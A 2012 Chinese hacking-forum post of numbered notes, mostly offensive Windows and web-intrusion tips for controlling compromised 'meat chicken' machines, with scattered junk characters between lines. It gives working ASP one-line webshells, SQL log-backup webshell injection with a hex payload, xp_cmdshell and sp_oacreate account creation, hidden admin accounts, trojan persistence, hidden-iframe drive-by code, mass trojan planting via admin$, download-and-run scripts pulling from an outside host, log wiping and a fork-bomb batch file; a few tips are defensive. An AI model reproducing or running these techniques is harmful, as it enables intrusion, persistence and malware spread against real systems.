找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2250|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
, s, \& G2 D/ J8 ], i, Y. `cacls C:\windows\system32 /G hqw20:R
$ `$ N% f# J: U$ _" ^6 p8 l思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入- ?4 E) i9 r9 Z- q* N
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
8 n; f! L3 K$ i& D4 K8 j
: L7 r+ C3 U  e/ \2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。1 q& s/ X2 p# E5 j) F
0 O/ d  s+ [- U9 R1 t/ m; k
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
4 {$ z" `) r  n8 J# H! O8 s8 Y- [* r% T
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
3 R8 ^& }1 [" }2 R0 a" L. ]+ r
$ Y# X3 t7 ?6 k+ A. d! x) h5、利用INF文件来修改注册表% z6 J1 L+ m0 X; F
[Version]7 S0 _2 d1 S1 x0 r* S* D* x0 I1 q
Signature="$CHICAGO$"
9 f" p: G) ?# N[Defaultinstall]
9 d  W: f% U  P% p# L* w$ R( qaddREG=Ating: i2 z' h' L6 R! F, \
[Ating]
, b% F, N& t* u2 a! O/ V& i# U" YHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"( k& ]" p  Q1 k- V' J
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
4 g* b# \4 {: l+ irundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
; y6 _7 @1 H% K& x' \6 ]# e3 k其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU- N6 `; V. i1 j
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
, v6 q! v3 R' @! W' a4 OHKEY_CURRENT_CONFIG 简写为 HKCC
/ m& m# B; v2 {0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
# ]+ A4 A# ?: z4 ^/ ?2 q: x"1"这里代表是写入或删除注册表键值中的具体数据2 [6 r* J( V1 Z5 B
: c; D5 @# k3 p1 o) E; z0 L3 n
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
6 e3 O( Z: k0 U; S多了一步就是在防火墙里添加个端口,然后导出其键值5 b2 v7 d, ?( n% C* r- ~# i
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
9 h( V9 f) w) _6 o+ S! i6 U1 L' [
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽% w, A' l  ~& Y( s0 e' L
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。- L% e" j! F. ]! P2 N# P; q
# \4 \& k7 _0 e/ P
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
) _* D+ C; _' c& ?7 y# ^0 W8 o) m% Q: y
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
! ~- F4 N) f8 }# Q7 f, l可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。7 V- c# X, {$ q7 w2 H

8 c8 _; ]4 v7 r5 ]3 j( _10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”; x- D! o9 t5 C% r
- L7 u5 u! ^9 d" |& e& j8 V% T
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
: J2 G4 _' ^0 ]* _2 F用法:xsniff –pass –hide –log pass.txt
- d/ _3 `7 u% F: [1 r- n+ M4 j1 r
! R3 l1 Q2 u0 m4 f5 m) e: Z12、google搜索的艺术
6 m9 l6 a5 r  d% g1 ?搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”6 D! K. h2 B* s7 o& Y( v! B
或“字符串的语法错误”可以找到很多sql注入漏洞。( I. [, O1 o# @; Y7 t% ^& e
: O# Z  p% i9 \  m& `' j! N5 U6 k
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。* O' A, s3 v6 c; a7 \
3 |4 ~4 Z1 ]7 U( i4 w1 N+ F& J, G
14、cmd中输入 nc –vv –l –p 19871 Y- ?' E' z% t3 w; |6 m, L5 v
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
* `# f  C: N/ A* T5 |: t
( v: [" L1 h  P% U, x* E15、制作T++木马,先写个ating.hta文件,内容为
0 V+ v: A6 Y: I0 {$ r<script language="VBScript">) L' z, g# o$ ?9 Q
set wshshell=createobject ("wscript.shell" )6 t; w. N! W4 E5 T
a=wshshell.run("你马的名称",1)
8 v! x+ b% Y1 p; p. x* h1 |window.close
0 ~/ t# x4 J- W/ \! T4 A! u</script>
4 P7 H1 v' X) o再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
) G& c/ R& B! t! c0 B& \- L+ N, o4 M, ]8 y% t
16、搜索栏里输入6 {* P: |& P3 q. Q4 w; M4 s2 x" D% l
关键字%'and 1=1 and '%'='' K6 x8 M9 n9 ?3 V
关键字%'and 1=2 and '%'='
7 ]$ {# \! V; D' W! `  Z" N比较不同处 可以作为注入的特征字符
$ y+ w8 A- y" L* |  i1 Z
( f" Q6 [  e9 y17、挂马代码<html>( a. p( s4 u3 c1 ]. r
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>7 @; E, Y$ E  |% m
</html>9 _" B0 c% P% _

% u3 Z# D4 y( p& u! M18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
  o/ W. m# S2 a; D4 e$ d0 j2 fnet localgroup administrators还是可以看出Guest是管理员来。
; k; z5 ?; ]3 ~) M1 J8 G5 b4 t: h1 F- x$ b* q9 }* L4 l, j3 G7 |
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等5 |& o2 i- R  q" B, _: h2 V& e
用法: 安装: instsrv.exe 服务名称 路径8 x* C5 z) o: h
卸载: instsrv.exe 服务名称 REMOVE
9 q& z2 H1 w& K; b4 u3 j
% r7 x2 B, `, `) Z+ \' q, w4 X6 K  X
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉9 b/ h" d/ H- }) t) z* Y2 m
不能注入时要第一时间想到%5c暴库。
: d9 [) c+ \) T
" n( L6 b3 ]. e. \22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
; i  @' N* i) ]/ U* A! Q5 P) M, j* w( M2 u4 V, t2 B* n
23、缺少xp_cmdshell时7 P4 v; U+ M' K
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
: d2 `/ \( c. t0 a; Y6 a假如恢复不成功,可以尝试直接加用户(针对开3389的)# `6 u- o( C: N: A
declare @o int
: C* T" I4 R& j, ^$ D$ M+ j8 y- Yexec sp_oacreate 'wscript.shell',@o out
( S' o+ A8 }, d" f  `+ i) w: U( y7 hexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员7 ?1 f% @" S; K$ b$ b& z

5 V# ~+ M" {: I0 j4 G24.批量种植木马.bat3 a* V' ~2 G4 u, f4 [! k/ j2 Y6 b# p
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中; ~8 E; D' T; b* i9 u! d
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
/ q/ l1 b  v5 D4 \$ e7 d* E扫描地址.txt里每个主机名一行 用\\开头
0 U% x1 d+ k3 ^% ?, m0 d( E, p, Z7 U# M( i% ~4 k! i- t% j
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
0 T7 I+ v: Y; y2 e1 W0 |
# B9 D% [0 X* t$ O5 f6 s* r26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.0 y6 M; B, s* D6 n
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.! E4 @  @8 ^, N, c, R1 M: _4 P, F
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
: h% Y+ P( L! q$ K" H. r% V: }9 q) |+ T5 i. j+ Z/ }
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP( @/ ^2 |  ^0 Y$ L
然后用#clear logg和#clear line vty *删除日志
: r& ^1 e7 S+ }' Q1 j0 a* r" l, ]
9 v4 a9 l. S, [. n& m, S' T, G28、电脑坏了省去重新安装系统的方法8 H2 @: j# ]( Z- q. y
纯dos下执行,
0 p. |' E& L* h' v* H6 E  w  j3 ~xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config1 F- b5 U( b3 c% m
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config# x0 G! ^" i, ?. Z: q
9 j% F% u/ L1 ?+ B8 X6 P  \
29、解决TCP/IP筛选 在注册表里有三处,分别是:  O0 a6 J' |* l2 K
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
7 b4 u9 I2 }! j2 _% L3 ^HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
0 J( B# V( D3 v( uHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. ]: ^9 K4 q: c% ~9 `4 S
分别用3 ^, E1 f( `( ^+ ]' B) q7 l) o1 k
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 g6 J# u  e8 h4 [regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- U( v  `0 v$ ~8 Pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" g& o. `* o) _; }% s3 q$ m
命令来导出注册表项
$ c: ?/ W- P9 M4 h8 u& y然后把三个文件里的EnableSecurityFilters"=dword:00000001,* s7 k1 {/ ?/ P$ N" M5 o" j) ~
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
1 V8 J! ~. [1 d: u  Iregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。( K5 z( C) U0 M
4 N! m" l3 g. {# _! C2 M& {5 c4 B
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U6 e4 T* ], _; [! V7 ?8 ~& ^
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
6 u  Q7 _1 \% B/ U
  _" f* Q3 r, l3 O' l' c) L31、全手工打造开3389工具
( _( q8 l, y0 n8 O' S打开记事本,编辑内容如下:
7 S+ Z1 F  d" I$ B# g& p6 [echo [Components] > c:\sql4 P: Z! F" j) k/ u, p
echo TSEnable = on >> c:\sql! _; j5 S9 E) G3 q& j" X0 _
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
  C7 U- X% ?2 a, g" V编辑好后存为BAT文件,上传至肉鸡,执行- n+ O+ j: X, Y4 l- d% }2 u
( L2 N& _" o8 Z
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马; o5 o2 [% t! Z2 A6 R
/ L2 z0 H  c# W# O2 f6 ?8 o
33、让服务器重启
3 y# p5 r, I+ j- s9 q写个bat死循环:0 n, o! |0 @( C! j8 E; K
@echo off- l/ K4 K. M( j# k) T
:loop1# O/ s8 f' W  e$ E
cls
( R5 ]1 G( A$ rstart cmd.exe$ W$ ]5 _9 I; `4 O4 G( g
goto loop1( v, [5 c7 V* q0 w* a( [6 a
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
/ u7 p/ f* Q0 `+ p2 _/ _7 ?5 b/ x7 h, d/ G" h) k  o
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
. ~* t% L& x" [0 v- P) l% {! V% e# h@echo off
. a# b( x" Z7 \0 k2 sdate /t >c:/3389.txt
3 ]4 V) ^. i2 Y/ H1 rtime /t >>c:/3389.txt
7 H6 K6 R/ W  ]: K2 K0 t) iattrib +s +h c:/3389.bat$ k" i' @( s* o- e% u
attrib +s +h c:/3389.txt5 Q! r4 Q* ]2 i6 z
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt% w  C: E7 R3 w( M7 l( v% t
并保存为3389.bat
7 M9 _0 l" O6 q- _  V$ x打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
' ~0 A' p; m4 \! l. N) U  T
( Z" Z" [( r# b5 R8 l- ]9 ~0 z35、有时候提不了权限的话,试试这个命令,在命令行里输入:
3 G7 E- J& T+ V4 b; [" H- f: V: Hstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
% h3 C( h0 H  a6 o: {, z/ N! @输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。' R" }, m6 b. q% N
. R9 X8 m0 ^% T+ v. l/ Y
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
! R' ~) b4 n0 |( Iecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址$ W( A& P; Q7 H- ^, b9 r# _' v
echo 你的FTP账号 >>c:\1.bat //输入账号
, J1 h2 k; B* @0 c  S0 jecho 你的FTP密码 >>c:\1.bat //输入密码5 r9 m; D; g5 E1 {% S7 z! y7 s% T. B
echo bin >>c:\1.bat //登入' U' F# H5 }$ J0 d2 F( G
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
" y2 _9 r1 M8 V! D( }  _3 e% vecho bye >>c:\1.bat //退出' e# S% a4 {6 K9 d
然后执行ftp -s:c:\1.bat即可
4 D& q( j" X6 e3 h* e# p4 z* R
# P3 j, k# c2 x! m1 u! T37、修改注册表开3389两法
4 j+ o  b- t6 k* ?(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表# G5 O, F$ d* t( _& f
echo Windows Registry Editor Version 5.00 >>3389.reg* i( E; _/ h, F( M$ V/ q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg) Q/ A1 w0 A$ u2 G; o  E$ [
echo "Enabled"="0" >>3389.reg$ r1 u# Z1 Y: J0 `# W9 L7 A
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows& {) h, X( N. U
NT\CurrentVersion\Winlogon] >>3389.reg
* W) W; X, H/ W  z, iecho "ShutdownWithoutLogon"="0" >>3389.reg
  x6 `* L/ x$ T4 ]) o2 `) V7 D9 kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer], b$ b% w' v& q+ Q& P
>>3389.reg2 X( _# ~( ?) Y* u6 A/ t
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
- M9 y2 P3 j5 j6 ~7 Z8 ^4 `0 U% p. zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]( u' ?4 S5 s2 c; R% g# T5 P
>>3389.reg7 }4 C  Z/ I3 m4 O3 {& G
echo "TSEnabled"=dword:00000001 >>3389.reg8 T& Z5 _- K# r  F5 w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg, q$ H. C6 P$ U5 U0 }
echo "Start"=dword:00000002 >>3389.reg* d- @- j& R0 z, c) R% g. H6 v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
' C, R( w* s3 q, Q* r2 Q; I>>3389.reg
2 ~3 D/ x# |6 {; J* o2 gecho "Start"=dword:00000002 >>3389.reg" s9 a+ M# E4 e
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
) t! u4 K' H' F* w2 T- R: W# qecho "Hotkey"="1" >>3389.reg1 f0 f" d, r  R6 g# p' H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ U& M8 [6 V! O0 j/ bServer\Wds\rdpwd\Tds\tcp] >>3389.reg8 h# s/ L; R' E  L, N4 u6 P
echo "PortNumber"=dword:00000D3D >>3389.reg
' z# t% p: h8 \- Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! \7 S2 d* c( k0 h7 C% ZServer\WinStations\RDP-Tcp] >>3389.reg) @. q+ G3 X( M) J6 D) i  b& N
echo "PortNumber"=dword:00000D3D >>3389.reg
6 Y! j- z0 M9 g) A9 D" H把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。1 s, e/ R4 D+ n+ ]& l/ d
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)- A3 @4 ?( B1 D3 ]6 P7 T
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效6 r0 c+ [9 A+ S5 ~
(2)winxp和win2003终端开启
! Q9 X8 x* P" t! ?) e用以下ECHO代码写一个REG文件:( x' H/ n' n* L- m( m
echo Windows Registry Editor Version 5.00>>3389.reg
% G5 B8 o$ T! V# F, a: J: Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. y3 X7 R9 m! o" }6 a0 e" }
Server]>>3389.reg
0 a, E7 x0 a' r& }& }! gecho "fDenyTSConnections"=dword:00000000>>3389.reg' g- Y' Y* O/ H$ K. R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 E7 X- R5 @6 {4 A1 F1 g' _% R% F! wServer\Wds\rdpwd\Tds\tcp]>>3389.reg
6 c# k! K1 d1 d* ~* p# Eecho "PortNumber"=dword:00000d3d>>3389.reg
& {- q! v  s" o9 R, ], necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 l/ e6 q7 p* w  x( a8 V
Server\WinStations\RDP-Tcp]>>3389.reg  H- E/ x' [9 ]5 b8 I: y
echo "PortNumber"=dword:00000d3d>>3389.reg
" Q5 Z! w+ I& a9 D& N然后regedit /s 3389.reg del 3389.reg
, G% q7 ~' n9 W" y0 NXP下不论开终端还是改终端端口都不需重启
( r( [. K* o3 A- X# {" D1 n, i6 z# F/ h
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃8 z, w! u2 S/ W/ d7 i, C% x0 H
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'9 ^9 x: R! |7 A$ J' O& g
! B' T8 a  o3 E' b% {+ p5 _! o  B3 L; M
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!+ ~6 @- @! k, R0 d
(1)数据库文件名应复杂并要有特殊字符
8 }. F( d0 |# j, l6 Y5 }- _' x$ \(2)不要把数据库名称写在conn.asp里,要用ODBC数据源# Y3 Y7 F1 k% J' W: i
将conn.asp文档中的
$ B# @5 j2 D* s/ H3 }DBPath = Server.MapPath("数据库.mdb")
7 m: ?- P2 w  F: E6 Bconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath* a' d8 G% P& u: n; E0 i

9 A8 z' X* k- x- ^修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置' ~" I9 |1 J; H8 D7 i) {" H+ {! {
(3)不放在WEB目录里
' w) L; D; f) k. Z5 O' c9 A1 [1 O/ a+ s; n$ c6 p
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
/ d6 u* R4 C6 X+ ^' z可以写两个bat文件
1 u# A: @7 l: T@echo off! h  V" z. q" `# n7 q; @; I7 l
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe: O5 T/ V( o! H' K
@del c:\winnt\system32\query.exe6 z$ x1 Q4 P6 K3 f
@del %SYSTEMROOT%\system32\dllcache\query.exe
+ `- f& R; c' D8 A9 c: ^0 i! M# ~( ]@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
; X' q6 M/ f, S, v
9 I0 E9 e: W' R4 v@echo off
- \% P; ]" C9 l" t@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
9 `3 A4 I; v2 `3 l0 Q% [3 Z" m; e@del c:\winnt\system32\tsadmin.exe7 Q" d8 c* [7 j- ]4 A7 l* r
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
- _% o, Y: _1 V1 i( a/ [2 u* Y& Q) h+ `/ ]8 j
41、映射对方盘符
4 v- w5 }; u$ U$ T+ ]2 Ftelnet到他的机器上,
9 Y# \, i$ s/ R6 ?& Qnet share 查看有没有默认共享 如果没有,那么就接着运行! G0 C( X! I+ L. N9 c/ |
net share c$=c:& n& o& I" f2 Z* ]5 `' N8 }
net share现在有c$
1 Q1 r# C0 W' L2 F在自己的机器上运行; C$ V9 o" I9 _5 M- j# i' u/ {
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
+ i% x1 X$ |0 a0 c, W- y; V# l/ m; b0 A" F1 z2 x
42、一些很有用的老知识
% x" }9 h  ?; t" O) ^& A* gtype c:\boot.ini ( 查看系统版本 )
- G5 h! G' h# c4 P+ V" j1 Anet start (查看已经启动的服务)
4 z! Z% E- m& I5 qquery user ( 查看当前终端连接 )# l& o9 H6 X' w
net user ( 查看当前用户 )
5 e% i$ A; b/ x9 ~net user 用户 密码/add ( 建立账号 )
4 \! T  [4 d3 U6 anet localgroup administrators 用户 /add (提升某用户为管理员)
: q0 z  p4 v, }( j' k! zipconfig -all ( 查看IP什么的 )) u& d5 C9 T* [% u- @& a
netstat -an ( 查看当前网络状态 )
& D& Z" f$ D$ y. L/ _findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
9 Y1 g5 ~8 T1 H8 D克隆时Administrator对应1F4
4 n" p) C$ k2 ?9 q. Zguest对应1F5: m. Y* b( F# H0 Q, y( a* y% ^
tsinternetuser对应3E8
1 w6 j! K9 W: l3 M) y* t7 |: B* D
43、如果对方没开3389,但是装了Remote Administrator Service
1 g, ]- F/ l# \! L) T用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
0 k/ W" N' ~9 G! Q7 I解释:用serv-u漏洞导入自己配制好的radmin的注册表信息- r8 @5 y" \! {" o+ j
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"# U( S$ y2 G0 w  R! o) p

) M( C* e2 h3 V# x2 f7 [; M7 Z$ ~! j44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)4 ?' X, L; h( }2 E8 `
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)% I5 u6 Z$ @- ]5 l

  I2 n" i, E- c8 g2 g8 B2 [45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)# A4 S0 u7 N0 ?3 c
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
3 K, R; v& `5 {^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
8 J) a1 b5 R8 b2 W# K) OCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
6 ~) b) u0 S6 G2 @/ x: Z! p( B1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs/ N( j4 E1 r  \; g) X5 H
(这是完整的一句话,其中没有换行符)7 g$ x) Q: k6 o+ D" {5 r+ I+ V+ f
然后下载:
% Y, A$ R5 n( p% ^4 Gcscript down.vbs http://www.hack520.org/hack.exe hack.exe7 D( @( V0 h9 q+ \4 J7 H
  ]' ^6 ]( L. K2 m  x
46、一句话木马成功依赖于两个条件:: ?- J: l; C  u- k
1、服务端没有禁止adodb.Stream或FSO组件/ V  q; e7 {8 Q2 ~
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
; {8 Q: a; ]4 S3 a
. }  c3 \6 W/ X$ ~; |: H  M- V/ S5 s47、利用DB_OWNER权限进行手工备份一句话木马的代码:
$ P4 O& [3 f1 k5 ^3 |2 q;alter database utsz set RECOVERY FULL--
. O5 [$ \4 W8 C* `;create table cmd (a image)--
% w# n6 n4 j; F0 F;backup log utsz to disk = 'D:\cmd' with init--4 d2 A+ O$ a8 \9 y" U. ]( @4 y
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--7 U! u4 p# [2 ?' _( y, X
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--3 u; |# L5 F. D& G9 R( w' L
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
8 z& ]5 i. O: W6 u0 M( ?' d5 ^8 P9 g. n; F. n
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:+ I$ v: V/ c* A8 f  D5 L# v

! d( K4 `% C) Z用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
; d6 v3 T! t2 p  m8 ~6 ]( [1 V5 p所有会话用 'all'。
1 j( K& ^5 E% f% O4 s-s sessionid 列出会话的信息。0 L' t2 A: w3 s( [- {7 H
-k sessionid 终止会话。
* ~6 _$ [$ o$ S- r3 X-m sessionid 发送消息到会话。
9 E, [" |- u3 N3 L$ _5 g  C  S$ K" a, t0 a
config 配置 telnet 服务器参数。: z* Y' }# T) _& l
! n; y  d6 F& x: A" S
common_options 为:
0 p6 A3 y; ]* P-u user 指定要使用其凭据的用户* M& V) k9 r- m+ S- d
-p password 用户密码
/ z1 [( {1 D8 y( R/ l! l0 x0 N, S4 g8 ~# R5 O6 \3 S* d$ P
config_options 为:$ ^6 n" t* ^' I# I
dom = domain 设定用户的默认域
/ f+ V  D$ S7 c" {: r/ o2 u- `ctrlakeymap = yes|no 设定 ALT 键的映射$ i2 t3 T5 v7 \; \6 V
timeout = hh:mm:ss 设定空闲会话超时值
9 l( \+ y( _. C7 @5 j9 }) `& }0 Ltimeoutactive = yes|no 启用空闲会话。6 `- p6 d* x8 z* C3 p% B
maxfail = attempts 设定断开前失败的登录企图数。& z7 a) D: z2 t* n4 S. C/ m/ f3 m% G
maxconn = connections 设定最大连接数。
- a8 U$ M8 v4 dport = number 设定 telnet 端口。! Z' h7 Z6 o6 Y! U# X
sec = [+/-]NTLM [+/-]passwd
9 p0 m3 z; e" C7 j3 R  |& _6 x# E+ m设定身份验证机构
% U6 V0 |' r* t) n* t, c+ Kfname = file 指定审计文件名。; c% M1 R0 u% ~
fsize = size 指定审计文件的最大尺寸(MB)。- q) Z- t- W6 a" l" Q' N% B: U* ]
mode = console|stream 指定操作模式。% @; [" v0 ]3 R. N) [7 N
auditlocation = eventlog|file|both
/ M" {5 A" i$ ^  _4 N" Q/ _0 @指定记录地点4 ?# q' O; _$ Z$ d% D, q& I+ A
audit = [+/-]user [+/-]fail [+/-]admin7 O' Y1 ]1 U1 v6 B+ g
, ~3 ~3 T  w  \7 `1 h
49、例如:在IE上访问:
" [* I) f/ T, N+ Pwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
  a* E$ R+ E* I# [hack.txt里面的代码是:# f  d4 ?6 i& O' y) n
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
+ Q2 y- \8 n5 u) P: M" f把这个hack.txt发到你空间就可以了!
# n/ d9 G% a- r! d8 m7 }2 H这个可以利用来做网马哦!7 l- a3 d7 c% ^+ `$ H0 l2 x

" r4 z: @; Q# c3 S7 g0 t( b3 m50、autorun的病毒可以通过手动限制!; E( q3 ?9 T1 I* j
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!6 e5 a% N( R3 L' j0 j& G& m6 [
2,打开盘符用右键打开!切忌双击盘符~
- V3 ?+ u: P0 J" K+ Z9 h9 s. n3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!5 q1 Z6 h/ }& p# Z

$ `& k7 l: t- x. i51、log备份时的一句话木马:
' s( ^# _: D4 Z' ?3 pa).<%%25Execute(request("go"))%%25>: U) i# X( R9 a+ x, @# S
b).<%Execute(request("go"))%>
